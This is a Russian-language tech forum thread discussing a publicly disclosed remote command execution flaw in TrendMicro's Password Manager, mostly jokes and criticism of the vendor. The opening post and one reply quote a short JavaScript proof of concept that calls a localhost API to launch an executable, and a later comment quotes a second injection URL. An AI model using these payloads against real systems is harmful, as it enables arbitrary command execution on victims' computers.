Наш антивирус позволяет более-лучше...

безопасность, всё пропало, их нравы, лолнуб

0

5

Цитата в переводе не нуждается:

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.
http://www.trendmicro.com/us/home/products/software/password-manager/index.html
This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.
It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().
This means any website can launch arbitrary commands, like this:
x = new XMLHttpRequest() x.open(«GET», "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/c... true); try { x.send(); } catch (e) {};

Ты такой поставил Вин10 @ свистим, пердим, сливаем данные @ ставим антивирус @ безопасно-модно-молодежно %)

Ссылка

←	Как определяется температура «по ощущениям»?

linux-4.4 или ЛОР уже не ЛОР?

→

Ну дык если пользователи ставят какой попало софт не заморачиваясь, то он и будет вырождаться, потому что нет смысла тогда писать нормальный софт.

goingUp ★★★★★
(12.01.16 23:03:20 MSK)

Ссылка

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

В голос.

CYB3R ★★★★★
(12.01.16 23:13:53 MSK)
Последнее исправление: CYB3R 12.01.16 23:14:05 MSK (всего исправлений: 1)

Ссылка

Вин10
ставим антивирус

ненужно

Unicode4all ★★★★★
(12.01.16 23:20:55 MSK)

Ты такой поставил Вин10 @ свистим, пердим, сливаем данные @ ставим антивирус @ безопасно-модно-молодежно %)

У меня проще, поставил из за жабы, которая душит, в стиме 90+ игр, за них деньги уплочены, вот изредка и играюсь в винде.

Да еще поставил killwin10. На всякий пожарный, но не критично.

Антивирус не ставил, сеть включаю в диспетчере устройств, для обновления игр.

А там, нехай стучит.

petyanamlt ★★★★
(13.01.16 00:19:40 MSK)

Ссылка

Ответ на: комментарий от Unicode4all 12.01.16 23:20:55 MSK

ненужно
Sign in
Microsoft account What's this?

да уж. точнее не скажешь.

thunar ★★★★★
(13.01.16 00:22:59 MSK)

Ссылка

Чем не нравится встроенный антивирус? Который бывший MS Security Essentials.

alman ★★★
(13.01.16 00:35:42 MSK)

Ссылка

Днище. Дырявое.

anonymous_incognito ★★★★★
(13.01.16 00:45:50 MSK)

Ответ на: комментарий от anonymous_incognito 13.01.16 00:45:50 MSK

не дырявое, дырявая та голова которая писала софт.

Deleted
(13.01.16 00:54:57 MSK)

Ответ на: комментарий от Deleted 13.01.16 00:54:57 MSK

Я уже даже не знаю, что хуже: если это нарочно сделали или если сапожник без сапог.

anonymous_incognito ★★★★★
(13.01.16 01:05:39 MSK)

Ссылка

Линк дай на исходную беседу: https://code.google.com/p/google-security-research/issues/detail?id=693

Не поленитесь и прочитайте всю нить до конца. Это такой цирк, что ни в какие ворота не лезет:

This thing is ridiculous, wtf is this:
https://localhost:49155/api/showSB?url=javascript:alert(topWindow.require(&qu...)
You were just hiding the global objects and invoking a browser shell...? ...and then calling it «Secure Browser»?!? The fact that you also run an old version with --disable-sandbox just adds insult to injury.

Жесть какая.

alex_the_v ★★★
(13.01.16 01:34:13 MSK)

Ссылка

Там дальше ещё круче:

If I understand what it's doing, isRequestOriginAllowed() relies on the client-supplied Referer and Origin headers, which are trivially spoofable with any non-browser HTTP client like curl or wget. I don't see how it can be considered a valid patch to the vulnerability. Am I missing something?

Вот это да.

alex_the_v ★★★
(13.01.16 01:40:07 MSK)

Ну, теперь я хотя бы узнал о существовании этого, кхем, антивируса.

Miguel ★★★★★
(13.01.16 10:20:23 MSK)

Ссылка

Ответ на: комментарий от alex_the_v 13.01.16 01:40:07 MSK

#42 Yes, a patch has been issued so this bug is considered resolved.
Status: Fixed

Невероятно.

Okay, you proved they're clowns and don't care about their users.

Серьезно, спасибо за развлекуху, но теперь надо просто забить.

t184256 ★★★★★
(13.01.16 10:25:28 MSK)

Ссылка

TrendMicro

Я один пользую Windows Defender да иногда гоняю AVZ в случае особой необход^Wпаранойи?

~~DeadEye~~ ★★★★★
(13.01.16 11:00:52 MSK)

Ссылка

Ответ на: комментарий от Unicode4all 12.01.16 23:20:55 MSK

Вин10
ставим антивирус

ненужно

Изображение "..." не может быть показано, так как содержит ошибки

Воистину ненужно!..

Sahas ★★★★☆
(13.01.16 11:05:50 MSK)

Ссылка

Феерично, разработкой ПО компьютерной безопасности занимаются люди которые в этом ничего не понимают. Сервер на node.js только один из косяков которые они сделали: http://www.extremetech.com/computing/220985-google-researcher-blasts-trendmic...